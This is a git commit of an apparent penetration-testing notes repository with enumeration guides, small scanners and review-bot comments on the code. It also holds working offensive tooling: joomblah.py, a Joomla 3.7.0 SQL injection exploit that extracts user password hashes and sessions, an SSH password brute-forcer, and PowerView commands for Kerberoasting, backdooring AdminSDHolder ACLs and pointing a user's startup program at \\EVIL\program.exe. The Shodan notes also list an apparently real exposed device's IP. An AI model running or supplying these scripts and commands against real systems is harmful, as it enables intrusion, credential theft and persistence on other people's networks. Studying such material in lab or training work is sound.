second commit

This commit is contained in:
Stefan Friese 2021-08-23 01:13:54 +02:00
parent 7bb194b436
commit d4648a2f18
148 changed files with 9860 additions and 0 deletions

1
PayloadsAllTheThings Submodule

@ -0,0 +1 @@
Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631

1
PowerSploit Submodule

@ -0,0 +1 @@
Subproject commit d943001a7defb5e0d1657085a77a0e78609be58f


@ -0,0 +1,207 @@
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : find specific data entries in a data set
# Add : add a new object to a destination
# Set : modify a given object
# Invoke : lazy catch-all
# Nouns:
# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
# Verb-Net* : indicates that Win32 API access is being used under the hood
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>
# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
# all enabled users, returning distinguishednames
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
# all disabled users
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE
# all users that require smart card authentication
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
# all users that *don't* require smart card authentication, only returning sam account names
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
# use multiple identity types for any *-Domain* function
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
# find all users with an SPN set (likely service accounts)
Get-DomainUser -SPN
# check for users who don't have kerberos preauthentication set
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
# find all service accounts in "Domain Admins"
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
# find users with sidHistory set
Get-DomainUser -LDAPFilter '(sidHistory=*)'
# find any users/computers with constrained delegation st
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount
# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local
# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
# Kerberoast any users in a particular OU with SPNs set
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
# Find-DomainUserLocation == old Invoke-UserHunter
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
# find all computers in a given OU
Get-DomainComputer -SearchBase "ldap://OU=..."
# Get the logged on users for all machines in any *server* OU in a particular domain
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}
# enumerate all gobal catalogs in the forest
Get-ForestGlobalCatalog
# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
# enumerate the current domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc...
# enumerate the current domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.
# enumerate what machines that a particular user/group identity has local admin rights to
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
# enumerate what machines that a given user in the specified domain has RDP access rights to
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain
# Find-InterestingDomainShareFile == old Invoke-FileFinder
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
# grant user 'will' the rights to change 'matt's password
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
# audit the permissions of AdminSDHolder, resolving GUIDs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
# find linked DA accounts using name correlation
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}
# save a PowerView object to disk for later usage
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml
# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local
# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name
# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
# extract the domain the foreign user was added to
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
# check if we've already enumerated this domain
if (-not $Domains[$ForeignUserDomain]) {
$Domains[$ForeignUserDomain] = $True
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
}
}
$ForeignMemberships | fl
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf
# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
}
# check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

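--- a/antivirus_evasion.md
+++ b/antivirus_evasion.md
@@ -0,0 +1,17 @@
+# Antivirus Evasion
+* Existing types
+* On-Disk evasion
+* In-Memory evasion
+* Detection Methods
+* Static Detection -- Hash or String/Byte Matching
+* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
+## Links
+* [cmnatic](https://cmnatic.co.uk/)
+* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)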

@ -0,0 +1 @@
Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60

BIN
enumeration/PSTools.zip Normal file

Binary file not shown.


@ -0,0 +1,48 @@
# Gobuster
[Repo](https://github.com/OJ/gobuster.git)
### Directories
```sh
gobuster dir -u <URL> -w <wordlist>
```
### DNS
```sh
gobuster dns -d <domainName> -w <wordlist> --show-cname --show-ips --resolver <dns-Server>
```
### Vhosts
* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
```sh
gobuster vhost -u <URL> -w <wordlist>
```
### FileExtension
```sh
-x
```
* Fuzz for files and file extensions
```sh
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
```
### Basic Auth
```sh
gobuster help dir
```
* `--username` and `--password`
* `dir -s` Accept HTTP Status
* `dir -k` Skip TLS Auth
* `dir -a` User Agent
### Wordlists
```sh
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
```

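--- a/enumeration/docs/nmap.md
+++ b/enumeration/docs/nmap.md
@@ -0,0 +1,17 @@
+# nmap
+# Usage
+```sh
+nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
+```
+```sh
+nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
+```
+## combo with searchsploit
+* nmap-full scan
+```sh
+sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
+searchsploit --nmap ./nmap-full.xml --verbose
+```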


@ -0,0 +1,35 @@
# WPScan
## Themes
```sh
wpscan --url <URL> --enumerate t
```
* `ls` for content
## Plugins
```sh
wpscan --url <URL> --enumerate p
```
## Users
```sh
wpscan --url <URL> --enumerate u
```
## Vulnerabilities
* WPVulnDB API is needed
* Plugins
```sh
wpscan --url <URL> --enumerate vp
```
## Password attack
```sh
wpscan --url <URL> --passwords <wordlist> --usernames <usersFromEnumeration>
```
## WAF Aggressiveness
```sh
wpscan --url <URL> --enumerate p --plugins-detection <aggressive/passive>

1
enumeration/gobuster Submodule

@ -0,0 +1 @@
Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125

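--- a/enumeration/joomblah.py
+++ b/enumeration/joomblah.py
@@ -0,0 +1,186 @@
+#!/usr/bin/python3
+import requests
+import sys
+import re
+import argparse
+import os
+import random
+import time
+import binascii
+def extract_token(resp):
+match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
+if match is None:
+print(" [!] Cannot find CSRF token")
+return None
+return match.group(1)
+def parse_options():
+parser = argparse.ArgumentParser(description='Jooma Exploit')
+parser.add_argument('url', help='Base URL for Joomla site')
+return parser.parse_args()
+def build_sqli(colname, morequery):
+return "(SELECT " + colname + " " + morequery + ")"
+def joomla_370_sqli_extract(options, sess, token, colname, morequery):
+sqli = build_sqli("LENGTH("+colname+")", morequery)
+length = joomla_370_sqli(options, sess, token, sqli)
+if not length:
+return None
+length = int(length)
+maxbytes = 30
+offset = 0
+result = ''
+while length > offset:
+sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery)
+value = joomla_370_sqli(options, sess, token, sqli)
+if not value:
+print(" [!] Failed to retrieve string for query:", sqli)
+return None
+value = binascii.unhexlify(value)
+result += value
+offset += len(value)
+return result
+def joomla_370_sqli(options, sess, token, sqli):
+sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)"
+data = {
+'option': 'com_fields',
+'view': 'fields',
+'layout': 'modal',
+'list[fullordering]': sqli_full,
+token: '1',
+}
+resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False)
+match = re.search(r'XPATH syntax error:\s*&#039;([^$\n]+)\s*&#039;\s*</bl', resp.text, re.S)
+if match:
+match = match.group(1).strip()
+if match[0] != ':' and match[-1] != ':':
+return None
+return match[1:-1]
+def extract_joomla_tables(options, sess, token):
+tables = list()
+first = False
+offset = 0
+while True:
+result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
+if result is None:
+if first:
+print("[!] Failed to retrieve first table name!")
+return False
+break
+tables.append(result)
+print(" - Found table:", result)
+first = False
+offset += 1
+return tables
+def extract_joomla_users(options, sess, token, table_name):
+users = list()
+offset = 0
+first = False
+print(" - Extracting users from", table_name)
+while True:
+result = joomla_370_sqli_extract(options, sess, token, "CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)", "FROM %s ORDER BY registerDate ASC LIMIT %d,1" % (table_name, offset) )
+if result is None:
+if first:
+print("[!] Failed to retrieve user from table!")
+return False
+break
+result = result.split('|')
+print(" [$] Found user",result)
+first = False
+offset += 1
+users.append(result)
+return users
+def extract_joomla_sessions(options, sess, token, table_name):
+sessions = list()
+offset = 0
+first = False
+print(" - Extracting sessions from", table_name)
+while True:
+result = joomla_370_sqli_extract(options, sess, token, "CONCAT(userid,0x7c,session_id,0x7c,username)", "FROM %s WHERE guest = 0 LIMIT %d,1" % (table_name, offset) )
+if result is None:
+if first:
+print("[!] Failed to retrieve session from table!")
+return False
+break
+result = result.split('|')
+print(" [$] Found session", result)
+first = False
+offset += 1
+sessions.append(result)
+return sessions
+def pwn_joomla_again(options):
+sess = requests.Session()
+print(" [-] Fetching CSRF token")
+resp = sess.get(options.url + "/index.php/component/users/?view=login")
+token = extract_token(resp)
+if not token:
+return False
+# Verify that we can perform SQLi
+print(" [-] Testing SQLi")
+result = joomla_370_sqli(options, sess, token, "128+127")
+if result != "255":
+print(" [!] Could not find SQLi output!")
+return False
+tables = extract_joomla_tables(options, sess, token)
+for table_name in tables:
+table_prefix = table_name[:-5]
+extract_joomla_users(options, sess, token, table_name)
+extract_joomla_sessions(options, sess, token, table_prefix + 'session')
+return True
+def print_logo():
+clear = "\x1b[0m"
+colors = [31, 32, 33, 34, 35, 36]
+logo = """
+.---. .-'''-. .-'''-.
+| | ' _ \ ' _ \ .---.
+'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
+.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
+| || ' | '| ' | '| .-. .-. '|| | | < |
+| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
+| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
+| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
+| | | | | | | ||| | || |`" __ | | | / | |
+| | |__| |__| |__|||\ / '| | .'.''| | | | | |
+__.' ' |/\'..' / '---'/ / | |_| | | |
+| ' ' `'-'` \ \._,\ '/| '. | '.
+|____.' `--' `" '---' '---'
+"""
+for line in logo.split("\n"):
+sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
+#time.sleep(0.05)
+def main(base_url):
+options = parse_options()
+options.url = options.url.rstrip('/')
+print_logo()
+pwn_joomla_again(options)
+if __name__ == "__main__":
+sys.exit(main("http://192.168.10.100:8080/joomla"))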
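Review bot: `main(base_url)` never reads its parameter — `parse_options()` takes the URL from `sys.argv` — so the literal passed on the `__main__` line is silently ignored; either drop the parameter or wire it in as the argparse default, e.g. `parser.add_argument('url', nargs='?', default=base_url, ...)`. `maxbytes = 30` in `joomla_370_sqli_extract` is assigned and never used while the chunk size `16` is hard-coded in the `HEX(MID(...))` call where it presumably belongs, and `import time` / `import os` are unused. The rendered page has stripped all indentation from this file, so block boundaries above are inferred from the `def` lines rather than visible.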

1
enumeration/kerbrute Submodule

@ -0,0 +1 @@
Subproject commit 9cfb81e4fab8037acb44c678773ca3f93bc2b39c


@ -0,0 +1,16 @@
#!/usr/bin/env python
from scapy.all import *
interface = "wls3"
ip_range = "192.168.179.0/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"
packet = Ether(dst=broadcastMac)/ARP(pdst=ip_range)
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)
for send, receive in ans:
print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))
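Review bot: The interface and target range on the `interface = "wls3"` and `ip_range = "192.168.179.0/24"` lines are hard-coded, so the script has to be edited for every network it is run on; take them from the command line with these as defaults, e.g. `interface = sys.argv[1] if len(sys.argv) > 1 else "wls3"`, and document the arguments in a header comment. `srp` with a raw Ethernet frame presumably needs raw-socket privileges and will fail with an exception rather than a message when they are missing — worth a one-line comment stating that the script must run with elevated rights.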


@ -0,0 +1,16 @@
#!/usr/bin/env python
import requests
import sys
sub_dirs = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
sub_dirs = _f.read().splitlines()
for dir in sub_dirs:
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
r = requests.get(dir_enum)
if r.status_code == 404:
pass
else:
print("Valid directory: ", dir_enum)
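Review bot: Every status other than 404 is printed as `Valid directory:` on the last line, so 403, 500 and redirect responses are reported as hits alongside real pages; test for the codes you actually mean, e.g. `if r.status_code == 200:`, or at least print the status with the URL so the reader can tell them apart. `requests.get(dir_enum)` has no `timeout=` and no exception handling, so one unresponsive host stalls the loop indefinitely and a `requests.ConnectionError` aborts the whole run. The wordlist path `/home/whackx/Downloads/wordlist2.txt` is specific to one machine and should come from `sys.argv[2]`, and `dir` shadows the builtin of the same name.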


@ -0,0 +1,7 @@
#!/usr/bin/env python
import requests
url = "https://download.sysinternals.com/files/PSTools.zip"
r = requests.get(url, allow_redirects=True)
open("PSTools.zip", 'wb').write(r.content)
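Review bot: The response body is written to disk on the last line without checking that the request succeeded, so an error page or a partial body would be saved as `PSTools.zip`; add `r.raise_for_status()` after the `get` and write with `with open("PSTools.zip", "wb") as f: f.write(r.content)` so the handle is closed (the `open(...).write(...)` form leaves it to the garbage collector). Since the archive contains executables that will be copied to and run on other hosts, the download should also be verified before use — compare its hash against a known-good value recorded out of band (`<EXPECTED_SHA256>` placeholder, not on this page) and fail if it differs. A `timeout=` on the `get` would keep the script from hanging on a stalled connection.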


@ -0,0 +1,35 @@
#!/usr/bin/env python
import sys
import socket
import pyfiglet
print(pyfiglet.figlet_format("Port Scanner"))
ip = sys.argv[1]
open_ports = []
ports = range(1,10000)
def probe_port(ip, port, result = 1):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
r = sock.connect_ex((ip,port))
if r == 0:
result = r
sock.close()
except Exception as e:
pass
return result
for port in ports:
sys.stdout.flush()
response = probe_port(ip, port)
if response == 0:
open_ports.append(port)
if open_ports:
print("[+] Open Ports are: ")
print(sorted(open_ports))
else:
print("[-] No Open Ports")
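Review bot: In `probe_port` the socket is closed only on the success path; if `settimeout` or `connect_ex` raises, the `except Exception: pass` swallows the error and the socket is never closed. Use `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:` so it is released on every path, and print the exception to stderr rather than discarding it — a name-resolution failure for `ip` currently looks exactly like every port being closed. The `sys.stdout.flush()` at the top of the loop flushes nothing, because the script prints only after the loop ends, and `result = 1` as a default parameter is an odd way to spell a local. `range(1,10000)` stops at 9999 and the range is not documented anywhere; a header comment stating the scanned range and the 0.5 s per-port timeout would help.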


@ -0,0 +1,22 @@
#!/usr/bin/env python
import requests
import sys
subdomains = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
subdomains = _f.read().splitlines()
for sub in subdomains:
http_domain = f"http://{sub}.{sys.argv[1]}"
try:
requests.get(http_domain)
except requests.ConnectionError:
pass
else:
print("Valid domain: ", http_domain)
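Review bot: `requests.get(http_domain)` has no `timeout=`, so a single unresponsive name stalls the loop indefinitely, and only `requests.ConnectionError` is caught — a `requests.Timeout` or `TooManyRedirects` aborts the whole run; use `requests.get(http_domain, timeout=5)` and catch `requests.RequestException`. The same machine-specific wordlist path as the directory script appears here; take it from `sys.argv[2]`. Any HTTP response is reported as `Valid domain`, so a wildcard DNS record makes every candidate look valid — worth a comment, or a check against a random control name first.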


@ -0,0 +1,32 @@
# Nikto
Scan web server vulnerabilities and more.
## mmap Input
* Pipe or pre run nmap
```sh
nmap -p80 172.16.0.0/24 -oG - | nikto -h -
```
```sh
nmap -oG -Pn -p-10000 10.10.214.141 | nikto -h 10.10.214.141 -p -
```
# Usage
* Example
```
nikto -h http://example.com i -p 80,8080
```
```sh
nikto -id <user>:<password> -h http://example.com:1234/manager/html
```
## Plugins
```sh
nikto -h http://example.com -Plugins apacheusers
```
* List all plugins
```sh
nikto -list-plugins
```


@ -0,0 +1,4 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Host: 10.10.156.247 () Status: Up
Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds


@ -0,0 +1,19 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Nmap scan report for 10.10.156.247
Host is up (0.064s latency).
Not shown: 64293 closed ports, 1231 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
31337/tcp open Elite
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds

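--- a/enumeration/nmap-full.xml
+++ b/enumeration/nmap-full.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247 -->
+<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
+<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
+<verbose level="0"/>
+<debugging level="0"/>
+<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.156.247" addrtype="ipv4"/>
+<hostnames>
+</hostnames>
+<ports><extraports state="closed" count="64293">
+<extrareasons reason="resets" count="64293"/>
+</extraports>
+<extraports state="filtered" count="1231">
+<extrareasons reason="no-responses" count="1231"/>
+</extraports>
+<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
+<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
+<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
+<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
+<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
+<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
+<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
+<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
+<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
+<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
+<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
+</ports>
+<times srtt="64161" rttvar="6610" to="100000"/>
+</host>
+<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>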

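--- a/enumeration/shodan.md
+++ b/enumeration/shodan.md
@@ -0,0 +1,31 @@
+# Shodan
+## Checking found Autonomous System Number (ASN)
+* Shodan does output ASN, not necessarily the IP of a small company. Search for
+```h
+asn:AS13335
+```
+* [ASN Check](https://dnschecker.org/asn-whois-lookup.php)
+## Banner
+* Example
+```json
+{
+"data": "Moxa Nport Device",
+"Status": "Authentication disabled",
+"Name": "NP5232I_4728",
+"MAC": "00:90:e8:47:10:2d",
+"ip_str": "46.252.132.235",
+"port": 4800,
+"org": "Starhub Mobile",
+"location": {
+"country_code": "SG"
+}
+}
+```
+## Filter
+* vulns
+```sh
+vuln:ms17-010
+```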

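--- a/enumeration/ssh_brute_force.py
+++ b/enumeration/ssh_brute_force.py
@@ -0,0 +1,38 @@
+#!/usr/bin/env python
+import paramiko
+import sys
+import os
+target = str(input("IP address: "))
+username = str(input("Username: "))
+password_file = str(input("Location of password file: "))
+def ssh_connect(password, code=0):
+ssh = paramiko.SSHClient()
+ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+try:
+ssh.connect(target, port=22, username=username, password=password)
+except paramiko.AuthenticationException:
+code = 1
+ssh.close()
+return code
+with open(password_file, 'rb') as _f:
+for line in _f.readlines():
+password = line.strip()
+print(password)
+try:
+response = ssh_connect(password)
+if response == 0 :
+print("[+] Password Found: " + password.decode())
+exit(0)
+if response == 1:
+print("[-] Nothing Found")
+except Exception as e:
+print(e)
+pass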
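Review bot: In `ssh_connect`, `ssh.close()` is reached only when `connect` succeeds or raises `paramiko.AuthenticationException`; any other exception (socket errors, `paramiko.SSHException`) propagates past the close, is printed by the outer `except Exception as e`, and leaves the client open. Move the close into a `finally:` block so every path releases it. `import os` is unused, and the `code=0` default parameter is really a local. `AutoAddPolicy()` accepts whatever host key the target presents without any verification — presumably intended for this tool, but it deserves a one-line comment saying so. The page has stripped the file's indentation, so the `try` nesting above is inferred.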

@ -0,0 +1 @@
Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a


@ -0,0 +1,13 @@
